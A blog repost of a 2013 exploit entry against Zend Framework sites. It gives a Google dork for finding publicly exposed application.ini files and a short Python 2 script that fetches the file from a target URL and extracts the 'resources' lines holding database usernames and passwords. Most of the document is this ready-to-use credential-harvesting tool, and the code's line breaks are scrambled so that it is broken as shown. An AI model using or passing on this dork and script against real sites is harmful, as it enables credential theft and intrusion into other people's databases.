分享程序员开发的那些事...
更新时间:2022-09-01 23:14:39
# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux
#[Comment]Greetz : Daniel Godoy
#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file
#Vulnerable page : http://target.com/application/configs/application.ini
#!/usr/bin/python
import
string
import
re
from
urllib2 import
Request, urlopen
disc =
"/application/configs/application.ini"
url =
raw_input
("URL: ")
req =
Request(url+disc)
rta =
urlopen(req)
print
"Result"
html =
rta.read()
rdo =
str(re.findall("resources.*=*", html))
print
rdo
exit